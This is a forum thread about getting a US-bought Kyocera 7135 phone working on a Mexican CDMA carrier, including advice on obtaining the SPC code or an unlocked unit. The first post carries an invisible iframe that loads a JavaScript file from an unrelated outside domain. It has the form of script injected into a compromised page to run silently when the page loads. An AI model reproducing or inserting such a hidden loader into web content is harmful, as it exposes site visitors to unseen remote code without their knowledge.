7135 in Mexico

No carrier in Mexico is offering the 7135. I own a 6035 and love it but is too bulky. Is there any chance for me to buy one 7035 in USA and subscribe with a mexican carrier?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Mexico?

Just a guess...
I would think ANY CDMA carrier would work, but you might not get the web surfing options.....the Plam should work just fine.
Are there any CDMA carriers there?

I was in Manzanillo for a few weeks in March and was able to use an LGVX10 (Verizon) that I had on the cell service there without any problems.

Since the 7135 is Tri-band CDMA, and operating on the same code scheme and frequencies as the VX10, I don't see why it would not work.

Not that I have used the 7135 in Mexico yet, but I don't think there would be any problem.

7035 in Mexico

Excelent service!!! Thanks Zman and Tlaudio. Sorry about my english, I'll try to make my self clear. Yes, ther are 2 CDMA carriers in Mexico. In fact I'm a subscriber of one with my 6035. The problem is that I don't know if theres gonna be any problem with the SPC (secret programming code) if I buy it in USA.

Do you know about any whole saler that salesthe unit with the SPC in Box? Technicians in my carrierīs office doesn't know much about models that arenīt courrently in sale in Mexico.

Help me couse I'd really love to own a 7035, ASAP.

Thanks in advance for your patience.

Manuel

How to find a 7135.....

Well I think you have two options:

1. Search E-bay for a 7135 (used)

2. Alltell, US Cellular, Verizion all will sell you a 7135 out-of contract. Not sure what the price would be, but I am sure it will be alot! I know they sell from $489-$600 with a 2 year contract.

I would give each of them a call & see who has the lowest price.

You can also try:
http://www.kyocera-wireless.com/

They have them out-of-contract for $699

Good luck.

Thank's Tlaudio. I'd appreciate all the info you can get, since it's very difficult to do it from Mexico. If you buy a phone from a carrier out of contract, woul'd they give me the SPC to contact any carrier in my country?

If I pay 700 usd (about 7,700 mexican pesos) which is a lot of money, do you consider it's worth it?

Thank you again for your help.

Manuel

Humm...

I would check to see if your current carrier (6035) has the knowledge to program the 7135. If they do NOT, then I would not get the 7135. My only worry would be getting the 7135 connected to their service...

It is a lot of $$, so I would check it out first 1st. Maybe a call to Kyocera would help?? I am sure you are not the only one that has wanted todo this....

Good Luck

OK, Tlaudio. I'll check it out with my current carrier. But I'm sure they are gonna ask me about the SPC. Are you sure I can get it from the retailer from wich I bought it?

Ask....

Ask when you purchase the 7135 if the phone is "un-locked" OR if they can provide the SPC.
